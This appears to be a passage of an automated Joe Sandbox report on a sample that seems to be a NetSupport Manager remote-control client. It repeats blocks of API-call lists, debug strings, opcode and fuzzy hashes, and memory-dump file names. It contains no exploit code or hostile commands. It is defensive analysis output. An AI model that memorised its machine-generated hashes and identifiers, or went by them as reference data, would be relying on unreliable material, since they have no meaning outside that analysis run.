                                                                                          • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                          • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                          • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                          APIs
                                                                                          Strings
                                                                                          • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$DeleteObject
                                                                                          • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                          • API String ID: 3011517232-3209293507
                                                                                          • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                          • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                          • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                          • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                          APIs
                                                                                          • _memmove.LIBCMT ref: 110D1128
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                          • API String ID: 1528188558-323366856
                                                                                          • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                          • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                          • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                          • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                          APIs
                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                          • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                          • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoMoveParametersSystemTimerWindow
                                                                                          • String ID: Max
                                                                                          • API String ID: 1521622399-2772132969
                                                                                          • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                          • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                          • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                          • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 110ED118
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                          • API String ID: 2577986331-1331251348
                                                                                          • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                          • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                          • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                          • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 11081417
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                          • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                          • API String ID: 2441568934-1875806619
                                                                                          • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                          • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                          • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                          • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                          APIs
                                                                                          • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                          • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumValue$CloseOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3785232357-0
                                                                                          • Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                          • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                          • Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                          • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                          • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                          • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                          • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SleepThread$CreateMessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 3347742789-0
                                                                                          • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                          • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                          • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                          • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(0000002C,F3EE1E80,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,F3EE1E80,?,?,00000000), ref: 110B336F
                                                                                          • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                          • SetEvent.KERNEL32(?,?,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                          • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterEvent
                                                                                          • String ID:
                                                                                          • API String ID: 3394196147-0
                                                                                          • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                          • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                          • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                          • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                          APIs
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                          • SetFocus.USER32(?), ref: 11007353
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                          • String ID: edit
                                                                                          • API String ID: 1305092643-2167791130
                                                                                          • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                          • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                          • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                          • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                          • _memmove.LIBCMT ref: 110092B6
                                                                                            • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: string too long
                                                                                          • API String ID: 2168136238-2556327735
                                                                                          • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                          • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                          • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                          • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 11041413
                                                                                          • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                          Strings
                                                                                          • VolumeControl exception : %hs, xrefs: 11041431
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
